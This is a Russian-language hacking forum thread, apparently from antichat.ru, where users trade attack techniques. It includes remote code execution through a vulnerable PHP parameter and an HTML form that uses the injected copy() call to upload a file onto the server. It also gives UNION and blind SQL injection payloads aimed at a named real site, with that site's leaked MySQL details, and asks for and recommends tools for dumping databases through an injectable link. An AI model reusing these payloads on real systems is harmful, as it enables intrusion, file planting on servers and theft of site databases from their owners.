теперь обратись к скрипту site/file.php?b=ls если выведет список директорий. то воспользуйся одним из следующих способов скачивания файла с помощью командной строки.
как обычно, суета =\ ты прав, поправляюсь) site/file.php?b=phpinfo(); должно вылезти сопсно оно) а залить так создаешь форму <form action="site/file.php?b=copy($_FILES[file][tmp_name], $_GET[aa]);&aa=/path/file.php" method="post" enctype="multipart/form-data"> <input type="file" name="file"><br> <input type="submit" value="Загрузить"><br> </form> открываешь выбираешь файл и жмёшь отправить
если на запрос .php?pageNum_Year=-2007/**/union/**/select/**/version(),2/* КАК правильно составит запрос
Не выходит заюзать sipt4 для слепой скули. Загружаю таблицы,перехожу на вкладку брутфорс.Туды фигачу: SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+{N1-100},1 url http://betonex.com.ua/?l=1 после прохода по Auto Determine пишет: Autodetermine failed http://betonex.com.ua/?l=2%20and%20substring(@@version,1,1)=4 Прошу помочь
Помочь-то с чем? С сиптом? Со скулей? Code: @@tmpdir: /tmp @@basedir: /usr/ version(): 5.1.36 database(): betonex_com_ua @@datadir: /var/lib/mysql/ @@version_compile_os: redhat-linux-gnu
Спасибо. Мне бы ещё с сиптом помогли. Не могу понять как правильно указывать параметры в BruteForce Attacking Нужно получить таблицы,в ручную долговато будет
проблема с софтом для дампа бд. Раньше юзал simple SQLi Dumper и SQL helper, но в последнее время софтины начали работать очень не стабильно, к тому же пропускают некоторые записи в базах. Подскажите альтернативы.
$n@ke,Bramin спасибо,но это официальные проги. Для них нужно имя БД и пароль, а в моем случае, у меня есть только уязвимый линк и раскрученная скуль инъекция, именно поэтому я прибегл к помощи таких программ как SQL Helper & SSiD, если есть их аналоги в работет через уязвимый параметр, то именно они мне и подходят!
jecka3000, тогда попробуйте эти https://forum.antichat.ru/showpost.php?p=236188&postcount=3 https://forum.antichat.ru/thread158100-toolza.html
